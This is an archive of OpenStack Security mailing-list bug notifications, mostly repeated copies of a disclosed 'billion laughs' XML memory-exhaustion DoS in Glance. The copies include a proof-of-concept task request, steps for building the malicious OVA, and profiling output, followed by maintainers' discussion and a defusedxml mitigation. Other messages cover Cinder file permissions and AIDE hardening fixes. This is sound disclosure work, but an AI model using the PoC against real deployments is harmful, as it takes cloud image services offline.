Sep 29 20:01:01 2016 From: ian.cordasco at rackspace.com (Ian Cordasco) Date: Thu, 29 Sep 2016 20:01:01 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929200101.23707.85680.malone@gac.canonical.com> > But I don't think anyone would call defining such variables "non- default" behavior. Charles, Glance doesn't require Keystone. That said, configuring the identity service is a far cry from setting up tasks to work. Beyond anecdotal from meetings where operators were asked "Do you use tasks?" and they say "I didn't know that existed" I don't know if operators supply every non-required configuration value. You can also specify a location for glance to store images on the local filesystem, but if people are using ceph, swift, or vmware they're not going to specify that. "It's optional but people fill in optional config values too" isn't sufficient to make this on by default. > Thus the work_dir option may be set by the cloud operator for other reasons as well, not only to import an OVA image. Rahul, every person on this thread associated with Glance has said exactly that. That still doesn't make this on by default (which is the point you and Charles are trying to push). Yes that means people may have a problem with this if they've enabled other tasks. Yes that's exactly what an OSSN would serve to address (educating folks about the potential for attacks by highly trusted users of the cloud if they're using a deprecated API). -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From charles.neill at rackspace.com Thu Sep 29 21:09:03 2016 From: charles.neill at rackspace.com (Charles Neill) Date: Thu, 29 Sep 2016 21:09:03 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160929210904.17609.42363.malone@wampee.canonical.com> @Brian: Thanks for the follow-up. I was just trying to figure out whether "work_dir" is commonly enabled by operators or not (which is kind of like asking you to look into an "operator crystal ball", I realize). I know that it must be specified manually, and that it would likely only be enabled if Tasks access was desired - I was just trying to assess whether enabling Tasks is something that happens 10% of the time or 90% of the time. At this point, barring any further comments, it seems the answer is that this is rare. @Ian: We're not trying to push some hidden agenda here. I think my questions have been pretty clear, and focused on one thing: Is this something most reasonable operators enable? I can't quantify this bug's likelihood of impact if I don't at least have a fuzzy answer to that question. My goal was simply to understand how much exposure there is likely to be in the community, and to align the response we make with the actual risk that is presented. Based on what I've seen, an OSSN seems reasonable. I bring up Keystone credentials (as used in many OpenStack services - not Glance, specifically) merely as an example of a configuration variable without a default value, but that would not make sense to leave undefined in 90% of situations. Without opinions from people more knowledgeable about Glance than myself, I can't make that determination. My guess is that we are using incompatible definitions of the phrase "by default." My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no). So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From sean_mcginnis at dell.com Thu Sep 29 21:11:48 2016 From: sean_mcginnis at dell.com (Sean McGinnis) Date: Thu, 29 Sep 2016 21:11:48 -0000 Subject: [Openstack-security] [Bug 1432003] Re: Files in Scality driver are created world readable/writable References: <20150313184619.24823.64007.malonedeb@chaenomeles.canonical.com> Message-ID: <20160929211149.24377.16248.launchpad@soybean.canonical.com> ** Tags added: drivers scality ** Changed in: cinder Importance: Undecided => Low -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1432003 Title: Files in Scality driver are created world readable/writable Status in Cinder: New Status in OpenStack Security Advisory: Won't Fix Bug description: On this line in the Scality driver: https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L124 files which are created by the utility function are set to word readable and writable. This function is utilized in the following cases: - volume creation: https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L156 - snapshot creation: https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L178 - volume extension: https://github.com/openstack/cinder/blob/master/cinder/volume/drivers/scality.py#L289 While it's possible that these files are supposed to be created in a directory which is protected, files should always be restricted according to the principle of least privilege. If these files are created in a directory without restricted permissions, any user on the system can tamper with these volumes and snapshots. To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1432003/+subscriptions From ian.cordasco at rackspace.com Fri Sep 30 12:32:46 2016 From: ian.cordasco at rackspace.com (Ian Cordasco) Date: Fri, 30 Sep 2016 12:32:46 -0000 Subject: [Openstack-security] [Bug 1625402] Re: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py References: <20160920002310.32086.46442.malonedeb@wampee.canonical.com> Message-ID: <20160930123246.24598.59302.malone@soybean.canonical.com> > My guess is that we are using incompatible definitions of the phrase "by default." My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no). Right. I suspect that's why we seem to be talking past each other. "by default" means to me, there's a default in the config file such that this is always on even if the operator doesn't intend it to be. You're asking for the % of operators using this and we have no way of knowing that. > So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common. As I mentioned above, the only answer I can give you is based on anecdotal evidence of the "Tasks exists?" response from operators. Since this is wide open, you can post this to the openstack-operators list to see if people paying attention there will weigh in. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625402 Title: Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py Status in Glance: Opinion Status in OpenStack Security Advisory: Opinion Bug description: Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process. This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing. As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3] Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder. ----------------------------------------- Example request ----------------------------------------- POST /v2/tasks HTTP/1.1 Host: localhost:1338 Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [ADMIN TOKEN] Content-Length: 287 {     "type": "import",     "input": {         "import_from": "http://127.0.0.1:9090/laugh.ova",         "import_from_format": "raw",         "image_properties": {             "disk_format": "raw",             "container_format": "ova",      "name": "laugh"         }     } } ----------------------------------------- Creating the malicious OVA/OVF ----------------------------------------- "laugh.ova" can be created like so: 1. Copy this into a file called "laugh.ovf":                       ]> &lol10; 2. Create the OVA file (tarball) with the "tar" utility:     $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova 3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:     $ python -m SimpleHTTPServer 9090 ----------------------------------------- Performance impact ----------------------------------------- Profiling my VM from a fresh boot: $ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting this task twice (repeating calls to the above command): Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB Object Metric Values ---------- -------------------- -------------------------------------------- devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00% devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4] ----------------------------------------- Mitigation ----------------------------------------- Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5] 1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24 2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184 3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities 4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64 5: https://pypi.python.org/pypi/defusedxml ----------------------------------------- Other ----------------------------------------- Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue). To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1625402/+subscriptions From 1619039 at bugs.launchpad.net Fri Sep 30 18:40:47 2016 From: 1619039 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 30 Sep 2016 18:40:47 -0000 Subject: [Openstack-security] [Bug 1619039] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160831203607.4213.54281.malonedeb@wampee.canonical.com> Message-ID: <20160930184047.27730.11967.malone@chaenomeles.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1619039 Title: Logging of martian packets should be configurable Status in openstack-ansible: Fix Released Bug description: The martian logging should be tunable. When neutron uses Linux bridging for networking, lots of martian packets will be logged. This logging isn't useful and can fill up a syslog server quickly. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1619039/+subscriptions From 1617343 at bugs.launchpad.net Fri Sep 30 18:40:49 2016 From: 1617343 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 30 Sep 2016 18:40:49 -0000 Subject: [Openstack-security] [Bug 1617343] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160826141422.16089.54915.malonedeb@soybean.canonical.com> Message-ID: <20160930184049.23882.42431.malone@gac.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1617343 Title: AIDE should not look at changes in /run Status in openstack-ansible: Fix Released Bug description: AIDE shouldn't be wandering into /run since things there only live temporarily. --------------------------------------------------- Changed entries: --------------------------------------------------- d =.... mc.. .. .: /etc/apparmor.d/libvirt d =.... mc.. .. .: /etc/libvirt/qemu d =.... mc.. .. .: /root f >b... mc..C.. .: /root/.bash_history f >.... mc..C.. .: /root/.ssh/known_hosts f >b... mci.C.. .: /root/.viminfo f =.... mci.C.. : /run/motd.dynamic d >.... mc.. .. : /run/shm f =.... ....C.. : /run/shm/spice.29052 d =.... mc.. .. : /run/systemd/sessions d =.... mc.. .. : /run/systemd/users f =.... mci.C.. : /run/systemd/users/0 d >.... . .. : /run/udev/data d =.... mc.. .. : /run/user To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1617343/+subscriptions From 1616281 at bugs.launchpad.net Fri Sep 30 18:40:51 2016 From: 1616281 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 30 Sep 2016 18:40:51 -0000 Subject: [Openstack-security] [Bug 1616281] Fix included in openstack/openstack-ansible-security 12.2.4 References: <20160824023003.4754.11744.malonedeb@gac.canonical.com> Message-ID: <20160930184051.23833.41051.malone@gac.canonical.com> This issue was fixed in the openstack/openstack-ansible-security 12.2.4 release. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1616281 Title: Can't initialize AIDE during subsequent playbook runs Status in openstack-ansible: Fix Released Bug description: AIDE isn't initialized by default because it can cause a lot of system load when it does its first check of a new system. If a deployer applies the security hardening role with ``initialize_aide`` set to False (the default), it won't be initialized. However, if they set it to True and re-run the playbook, AIDE is already configured and the handler to initialize AIDE won't execute. To manage notifications about this bug go to: https://bugs.launchpad.net/openstack-ansible/+bug/1616281/+subscriptions